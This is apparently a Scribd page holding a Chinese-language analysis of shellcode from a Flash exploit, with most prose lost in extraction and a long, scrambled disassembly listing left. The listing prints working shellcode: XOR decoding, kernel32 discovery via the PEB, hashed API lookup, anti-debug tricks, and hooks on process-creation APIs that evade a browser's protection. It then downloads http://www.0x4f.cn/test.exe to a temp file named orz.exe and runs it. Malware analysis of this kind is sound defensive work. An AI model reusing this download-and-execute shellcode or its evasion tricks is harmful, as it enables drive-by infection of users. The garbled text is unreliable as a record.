Scribd Logo
Upload

Welcome to Scribd!

  • flash漏洞所用shellcode的分析

    Uploaded by

    Alex Lin
    33 views12 pages

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    33 views12 pages

    flash漏洞所用shellcode的分析

    Uploaded by

    Alex Lin

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 12

    flash shellcode

    flash shellcode

    win 9,0,115,0ie.swf.swf
    shellcode 0xEB shellcode
    OD shellcode
    flash
    shellcode ActiveX shellcode
    shellcode
    shellcode shellcode xor API
    shellcode

    1. shellcode shellcode
    ExitThread flash
    URL
    2. kernel32.dll ZwCreateProcessEx win2000 NtCreateProcess
    ZwWriteVirtualMemory inline hookhook
    CreateProcessInternalW inline hook
    MAXTHON API HOOK
    anti
    hook

    3. CreateProcessInternalA shellcode
    WinExec
    shellcode (1)(2)

    xor
    00407000 > /EB 16
    jmp short 00407018
    00407002 |5B
    pop ebx
    00407003 |33C9
    xor ecx, ecx
    00407005 |66:B8 2245 mov ax, 4522
    00407009 |66:31044B
    xor word ptr [ebx+ecx*2], ax
    0040700D |41
    inc ecx

    ; (1)F8
    ; (3)

    ; xor

    0040700E |40
    inc eax
    0040700F |66:81F9 6201 cmp

    cx, 162

    00407014 ^|7C F3
    jl short 00407009
    00407016 |EB 05
    jmp short 0040701D

    00407018 \E8 E5FFFFFF call 00407002

    ; (4) F4
    ; (5) F8
    ; (2)F7

    kernel32.dll API
    PEB kernel32.dll
    API
    0040701D

    00407022

    00407023
    00407025
    00407026
    00407029
    n
    0040702F
    00407032
    00407035
    00407036
    ebp
    00407039
    0040703B
    00407041

    E9 65020000
    5F

    pop

    jmp

    00407287

    edi

    ; (6)
    ; (8)

    6A 30
    push 30
    59
    pop ecx
    64:8B01
    mov eax, dword ptr fs:[ecx]
    8B98 A8000000 mov ebx, dword ptr [eax+A8]
    8B40 0C
    8B70 1C
    AD
    8B68 08

    ; _PEB
    ; _PEB.OSMijorVersio

    mov eax, dword ptr [eax+C]


    mov esi, dword ptr [eax+1C]
    lods dword ptr [esi]
    mov

    ebp, dword ptr [eax+8]

    ; (9)kernel32.dll

    8BF7
    mov esi, edi
    81EC 00020000 sub esp, 200
    85DB
    test ebx, ebx

    00407043 75 07
    jnz short 0040704C
    ; (10) 2000
    XP XP
    00407045 C746 24 C9525E5>mov dword ptr [esi+24], 535E52C9
    ; 2000
    2000 NtCreateProcess XP
    NtCreateProcessEx
    0040704C 6A 09
    push 9
    0040704E 59
    pop ecx
    0040704F E8 EE010000 call 00407242
    ; (11) F8

    00407054 ^ E2 F9
    loopd short 0040704F
    ; F4
    API esi [esi+XX] XX

    0x00 LoadLibraryA

    0x04 GetTempPathA
    0x08 DeleteFileA
    0x0C CreateProcessInternalA
    0x10 ExitThread,
    0x14 VirtualProtect
    0x18 CreateProcessInternalW
    0x1C CompareFileTime
    0x20 GetSystemTimeAsFileTime
    retn
    retn
    anti-debug
    00407056 40
    inc eax
    00407057 8038 C3
    cmp byte ptr [eax], 0C3

    ; GetSystemTimeAsFileTime

    0040705A ^ 75 FA
    jnz short 00407056
    retn
    0040705C 8946 30
    mov dword ptr [esi+30], eax
    7C801881

    ; (12)
    ;

    kernel32.dll NATIVE API


    0040705F 6A 02
    00407061 59

    push 2
    pop ecx

    00407062 E8 9E010000 call 00407205

    00407067 ^ E2 F9
    loopd short 00407062

    esi [esi+XX] XX
    0x24 ZwCreateProcessExwin2000 NtCreateProcess
    0x28 ZwWriteVirtualMemory
    LoadLibraryA urlmon.dll URLDownloadToFileA
    call push jmp
    00407069 6A 01
    push 1
    0040706B 59
    pop ecx
    0040706C 68 6F6E0000 push 6E6F
    00407071 68 75726C6D push 6D6C7275
    00407076 54
    push esp
    ; 'urlmon'
    00407077 8B06
    mov eax, dword ptr [esi]
    ; LoadLibraryA
    00407079 E8 10010000 call 0040718E
    ; (13) anti-debug
    F9
    0040707E 95
    xchg eax, ebp
    ; urlmon.dll ebp
    0040707F E8 BE010000 call 00407242
    ; (14)

    F8 URLDownloadToFileA
    URLDownloadToFileA [esi+2C]

    00407084 68 3D400000 push 403D


    00407089 6A FF
    push -1
    0040708B 6A FF
    push -1
    0040708D 3E:DB2C24
    fld tbyte ptr ds:[esp]
    00407091

    00407092
    00407093
    00407094
    00407097
    00407099
    0040709E
    004070A3
    004070A4
    004070A5
    004070A8

    50

    push eax

    50
    push eax
    54
    push esp
    FF56 20
    call dword ptr [esi+20]
    8BC4
    mov eax, esp
    68 6EC2C801 push 1C8C26E
    68 00C0B336 push 36B3C000
    54
    push esp
    50
    push eax
    FF56 1C
    call dword ptr [esi+1C]
    48
    dec eax

    004070A9 75 03
    jnz short 004070AE

    004070AB FF56 10
    call dword ptr [esi+10]
    shellcode

    ; FILETIME

    ; GetSystemTimeAsFileTime

    ; CompareFileTime
    ; (16)
    ; ExitThread

    ExitThread
    EIP
    shellcode NATIVE API

    NATIVE API inline hook


    hook shellcode
    CreateProcessInternalW

    shellcode
    NATIVE API PEB
    inline hook shellcode
    shellcode NATIVE API
    PEB
    shellcode

    004070AE 6A 30

    push 30

    004070B0 59
    pop ecx
    004070B1 64:8B19
    mov ebx, dword ptr fs:[ecx]
    004070B4 8DAB 00040000 lea ebp, dword ptr [ebx+400]

    004070BA 8B9B A8000000 mov ebx, dword ptr [ebx+A8]


    XP 2003
    004070C0 8BFD
    mov edi, ebp
    004070C2 56
    push esi

    ; (17) PEB
    ; 2000

    004070C3 E9 E0000000 jmp 004071A8


    ; (18)
    004070C8 5E
    pop esi
    ; (20)
    004070C9 F3:A5
    rep movs dword ptr es:[edi], dword ptr [esi]
    ;
    NATIVE API inline hook
    004070CB 5E
    pop esi

    ZwCreateProcessExwin2000 NtCreateProcess
    ZwWriteVirtualMemory
    push XXX,retn
    win2000/XP/2003
    004070CC 8B7E 24

    mov

    edi, dword ptr [esi+24]

    ; ZwCreateProcessEx

    004070CF E8 25010000 call 004071F9


    ; VirtualProtect 0x20

    004070D4 6A 1A
    push 1A
    ; 2003 NtCreateProcessEx

    004070D6 6A 0D
    push 0D
    ; XP NtCreateProcessEx

    004070D8 6A 00
    push 0
    ; 2000 NtCreateProcess

    004070DA 8BC5
    mov eax, ebp
    004070DC 03049C
    add eax, dword ptr [esp+ebx*4]
    ;

    004070DF C607 68
    mov byte ptr [edi], 68
    ; "push"
    004070E2 47
    inc edi
    004070E3 AB
    stos dword ptr es:[edi]
    ;
    004070E4 C607 C3
    mov byte ptr [edi], 0C3
    ; ret
    004070E7 8B7E 28
    mov edi, dword ptr [esi+28]
    ; ZwWriteVirtualMemory
    004070EA E8 0A010000 call 004071F9
    004070EF 6A 3D
    push 3D
    ; 2003 ZwWriteVirtualMemory
    ZwCreateProcess(Ex)
    004070F1 6A 36
    push 36
    004070F3 6A 27
    push 27
    004070F5 8BC5
    mov eax, ebp
    004070F7 03049C
    add eax, dword ptr [esp+ebx*4]
    004070FA C607 68
    mov byte ptr [edi], 68
    004070FD 47
    inc edi

    004070FE AB
    stos dword ptr es:[edi]
    004070FF C607 C3
    mov byte ptr [edi], 0C3
    ZwCreateProcessEx ZwWriteVirtualMemory

    MAXTHON2
    MAXTHON2 MAXTHON2
    ZwCreateProcessEx ZwWriteVirtualMemory IAT HOOK

    shellcode kernel32.dll ZwCreateProcessEx ZwWriteVirtualMemory

    MAXTHON2 shellcode
    shellcode kernel32.dll MAXTHON2 hook
    MAXTHON2 dll
    shellcode inline hook

    MAXTHON2 IAT HOOK

    CreateProcessInternalW
    MAXTHON2 CreateProcessInternalW inlline hook
    00407102
    00407105
    0040710A
    0040710F
    00407114
    00407119

    8B7E 18
    mov edi, dword ptr [esi+18]
    E8 EF000000 call 004071F9
    68 68080A00 push 0A0868
    68 68080A00 push 0A0868
    68 558BEC6A push 6AEC8B55
    8B049C
    mov eax, dword ptr [esp+ebx*4]

    0040711C
    inline hook
    0040711D
    0040711F
    00407120
    00407121
    00407123
    00407126

    AB

    stos dword ptr es:[edi]

    33C0
    50
    50
    6A FF
    8B049C
    AA

    xor eax, eax


    push eax
    push eax
    push -1
    mov eax, dword ptr [esp+ebx*4]
    stos byte ptr es:[edi]

    ; CreateProcessInternalW

    shellcode
    Temp orz.exe
    00407127
    0040712D
    0040712E
    00407133

    8DBE 33010000 lea edi, dword ptr [esi+133]


    57
    push edi
    68 FF000000 push 0FF
    FF56 04
    call dword ptr [esi+4]

    ; GetTempPathA

    00407136 03C7

    add

    eax, edi
    ; temp

    00407138 C700 6F727A2E mov dword ptr [eax], 2E7A726F

    0040713E C740 04 6578650>mov dword ptr [eax+4], 657865


    "orz.exe"

    00407145 57
    00407146 FF56 08

    push edi
    call dword ptr [esi+8]

    ; DeleteFileA

    URLDownloadToFileA http://www.0x4f.cn/test.exe
    orz.exe
    00407149
    0040714B
    0040714C
    0040714D

    33DB
    53
    53
    57

    xor ebx, ebx


    push ebx
    push ebx
    push edi

    0040714E 8D46 34
    lea eax, dword ptr [esi+34]
    "http://www.0x4f.cn/test.exe"
    00407151 50
    push eax
    00407152 53
    push ebx
    00407153 FF56 2C
    call dword ptr [esi+2C]

    ; URL

    ; URLDownloadToFileA

    shellcode CreateProcessInternalA
    CreateProcessInternalW ZwCreateProcessEx ZwWriterVirtualMemory
    CreateProcessInternalA
    00407156
    00407158
    0040715A
    0040715C
    0040715D
    0040715E
    0
    00407160
    00407167
    00407169
    0040716C
    0040716D
    0040716E
    0040716F
    00407170
    00407171

    33C0
    8BFC
    6A 12
    59
    AB
    ^ E2 FD

    xor eax, eax


    mov edi, esp
    push 12
    pop ecx
    stos dword ptr es:[edi]
    loopd short 0040715D

    66:C74424 3C 01>mov word ptr [esp+3C], 101


    8BFC
    mov edi, esp
    8D47 10
    lea eax, dword ptr [edi+10]
    51
    push ecx
    57
    push edi
    50
    push eax
    51
    push ecx
    51
    push ecx
    51
    push ecx

    00407172
    00407173
    00407174
    00407175

    51
    51
    51
    51

    push
    push
    push
    push

    ecx
    ecx
    ecx
    ecx

    00407176
    0040717C
    0040717D
    0040717E
    00407181
    00407187

    8D96 33010000 lea edx, dword ptr [esi+133]


    52
    push edx
    51
    push ecx
    FF56 0C
    call dword ptr [esi+C]
    81C4 54020000 add esp, 254
    61
    popad

    00407188 FF71 EC
    push dword ptr [ecx-14]

    0040718B C2 0400
    retn 4

    ; orz.exe

    ; CreateProcessInternalA

    call
    0040718E
    00407191
    00407192
    00407193
    00407194
    00407196
    00407198
    0040719A
    0040719C
    0040719F
    004071A0
    004071A1
    004071A3
    004071A5
    retn
    004071A6

    8B56 30
    41
    5B
    52
    03E1
    03E1
    03E1
    03E1
    83EC 04
    5A
    53
    8BDA
    ^ E2 F7
    52
    FFE0

    mov edx, dword ptr [esi+30]


    inc ecx
    pop ebx
    push edx
    add esp, ecx
    add esp, ecx
    add esp, ecx
    add esp, ecx
    sub esp, 4
    pop edx
    push ebx
    mov ebx, edx
    loopd short 0040719C
    push edx
    jmp

    eax

    ; (14)

    ;
    ; jmp API

    call
    004071A8 E8 1BFFFFFF
    F7

    call 004070C8

    ; (19)

    NATIVE API
    004071AD 6A 29
    004071AF 58

    push 29
    pop eax

    ; win2000 NtCreateProcess

    004071B0 36:8D5424 04 lea edx, dword ptr [esp+4]


    004071B5 CD 2E
    int 2E
    004071B7 C2 2000
    retn 20
    004071BA
    004071BC
    004071BD
    004071C2
    004071C4

    6A 30
    push 30
    58
    pop eax
    BA 0003FE7F mov edx, 7FFE0300
    FF12
    call dword ptr [edx]
    C2 2000
    retn 20

    ; XP ZwCreateProcessEx

    004071C7
    004071C9
    004071CA
    004071CF
    004071D1

    6A 32
    push 32
    58
    pop eax
    BA 0003FE7F mov edx, 7FFE0300
    FF12
    call dword ptr [edx]
    C2 2400
    retn 24

    ; win2003 ZwCreateProcessEx

    004071D4 B8 F0000000 mov eax, 0F0


    ZwWriteVirtualMemory
    004071D9 36:8D5424 04 lea edx, dword ptr [esp+4]
    004071DE CD 2E
    int 2E
    004071E0 C2 1400
    retn 14

    ; win2000

    004071E3 B8 15010000 mov eax, 115


    004071E8 EB 05
    jmp short 004071EF

    ; XP ZwWriteVirtualMemory

    004071EA B8 1F010000 mov eax, 11F


    ZwWriteVirtualMemory XP
    004071EF BA 0003FE7F mov edx, 7FFE0300
    004071F4 FF12
    call dword ptr [edx]
    004071F6 C2 1400
    retn 14

    ; win2003

    VirtualProtect API
    004071F9 52
    push edx
    004071FA 54
    push esp
    004071FB 6A 04
    push 4
    004071FD 6A 20
    push 20
    004071FF 57
    push edi
    00407200 FF56 14
    call dword ptr [esi+14]
    0x20
    00407203 5A
    pop edx
    00407204 C3
    retn

    ; ViturlProtect

    kernel32.dll NATIVE API shellcode

    00407205
    00407206
    00407209
    0040720A
    0040720E
    0040720F
    00407211
    00407213
    00407215
    00407217
    00407218
    00407219
    0040721C
    00407220
    00407221
    00407223
    00407226
    00407228
    0040722A
    0040722D
    0040722F
    00407230
    00407232
    00407234
    00407235
    00407237
    0040723A
    0040723C
    0040723F
    00407240
    00407241

    51
    push ecx
    8B45 3C
    mov eax, dword ptr [ebp+3C]
    45
    inc ebp
    8B5C28 7F
    mov ebx, dword ptr [eax+ebp+7F]
    4D
    dec ebp
    03DD
    add ebx, ebp
    8B13
    mov edx, dword ptr [ebx]
    03D5
    add edx, ebp
    33C9
    xor ecx, ecx
    49
    dec ecx
    41
    inc ecx
    8B048A
    mov eax, dword ptr [edx+ecx*4]
    8D4428 02
    lea eax, dword ptr [eax+ebp+2]
    60
    pushad
    33C9
    xor ecx, ecx
    0FBE10
    movsx edx, byte ptr [eax]
    3AD6
    cmp dl, dh
    74 08
    je short 00407232
    C1C9 07
    ror ecx, 7
    03CA
    add ecx, edx
    40
    inc eax
    ^ EB F1
    jmp short 00407223
    390F
    cmp dword ptr [edi], ecx
    61
    popad
    ^ 75 E1
    jnz short 00407218
    8B43 10
    mov eax, dword ptr [ebx+10]
    03C5
    add eax, ebp
    8B0488
    mov eax, dword ptr [eax+ecx*4]
    AB
    stos dword ptr es:[edi]
    59
    pop ecx
    C3
    retn

    PE API
    N
    00407242
    00407243
    00407244
    00407247
    0040724B
    0040724D
    0040724E
    00407251

    51
    push ecx
    56
    push esi
    8B75 3C
    mov esi, dword ptr [ebp+3C]
    8B742E 78
    mov esi, dword ptr [esi+ebp+78]
    03F5
    add esi, ebp
    56
    push esi
    8B76 20
    mov esi, dword ptr [esi+20]
    03F5
    add esi, ebp

    00407253
    00407255
    00407256
    00407257
    00407258
    0040725A
    0040725C
    0040725F
    00407261
    00407263
    00407266
    00407268
    00407269
    0040726B
    0040726D
    0040726F
    00407270
    00407273
    00407275
    00407279
    0040727C
    0040727E
    00407281
    00407283
    00407284
    00407285
    00407286

    33C9
    xor ecx, ecx
    49
    dec ecx
    41
    inc ecx
    AD
    lods dword ptr [esi]
    03C5
    add eax, ebp
    33DB
    xor ebx, ebx
    0FBE10
    movsx edx, byte ptr [eax]
    3AD6
    cmp dl, dh
    74 08
    je short 0040726B
    C1CB 07
    ror ebx, 7
    03DA
    add ebx, edx
    40
    inc eax
    ^ EB F1
    jmp short 0040725C
    3B1F
    cmp ebx, dword ptr [edi]
    ^ 75 E7
    jnz short 00407256
    5E
    pop esi
    8B5E 24
    mov ebx, dword ptr [esi+24]
    03DD
    add ebx, ebp
    66:8B0C4B
    mov cx, word ptr [ebx+ecx*2]
    8B5E 1C
    mov ebx, dword ptr [esi+1C]
    03DD
    add ebx, ebp
    8B048B
    mov eax, dword ptr [ebx+ecx*4]
    03C5
    add eax, ebp
    AB
    stos dword ptr es:[edi]
    5E
    pop esi
    59
    pop ecx
    C3
    retn

    00407287 E8 96FDFFFF

    call 00407022

    ; (7)call F7

    API shellcode
    API URLshellcode [esi+XX]

    0x00 LoadLibraryA
    0x04 GetTempPathA
    0x08 DeleteFileA
    0x0C CreateProcessInternalA
    0x10 ExitThread,
    0x14 VirtualProtect
    0x18 CreateProcessInternalW
    0x1C CompareFileTime
    0x20 GetSystemTimeAsFileTime
    0x24 ZwCreateProcessExwin2000 NtCreateProcess
    0x28 ZwWriteVirtualMemory

    0x2C URLDownloadToFileA
    0x30 retn
    0x34 ASCII "http://www.0x4f.cn/test.exe"
    shellcode shellcode
    shellcode

    shellcode shellcode

    update: win2000 win2003 shellcode


    NATIVE API inline hook win2000/XP/2003 NATIVE API
    shellcode _PEB.OSMijorVersion

    You might also like